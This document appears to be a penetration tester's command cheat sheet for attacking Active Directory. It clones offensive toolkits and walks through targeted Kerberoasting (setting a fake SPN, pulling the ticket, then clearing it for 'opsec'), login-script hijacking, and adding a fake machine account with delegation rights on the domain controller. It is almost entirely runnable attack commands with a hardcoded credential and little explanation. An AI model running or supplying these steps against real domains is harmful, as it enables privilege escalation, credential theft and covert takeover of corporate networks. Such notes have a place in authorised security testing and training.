git clone https://github.com/SecureAuthCorp/impacket.git
git clone https://github.com/PowerShellMafia/PowerSploit.git
git clone https://github.com/Kevin-Robertson/Powermad.git
git clone https://github.com/GhostPack/Rubeus.git
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
## Kerberoasting
Set-DomainObject -Credential $Cred -Identity Target_User -SET @{serviceprincipalname='nonexistent/BLAHBLAH'}
Get-DomainUser Target_User | Select serviceprinciplename
Get-DomainSPNTicket -Credential $Cred Target_User | fl
# Opsec remove
Set-DomainObject -Credential $Cred -Identity Target_User -Clear serviceprincipalname
## Login scripts
Set-DomainObject -Identity Target_User -SET @{scriptpath="C:\Windows\Tasks\login.ps1"}
# Import PowerMad
Import-Module ./PowerMad.ps1
# Set variables
Set-Variable -Name "FakePC" -Value "FAKE01"
Set-Variable -Name "targetComputer" -Value "DC"
# With Powermad, Add the new fake computer object to AD.
New-MachineAccount -MachineAccount (Get-Variable -Name "FakePC").Value -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose
# With Built-in AD modules, give the new fake computer object the Constrained Delegation privilege.
Set-ADComputer (Get-Variable -Name "targetComputer").Value -PrincipalsAllowedToDelegateToAccount ((Get-Variable -Name "FakePC").Value + '$')
# With Built-in AD modules, check that the last command worked.
Get-ADComputer (Get-Variable -Name "targetComputer").Value -Properties PrincipalsAllowedToDelegateToAccount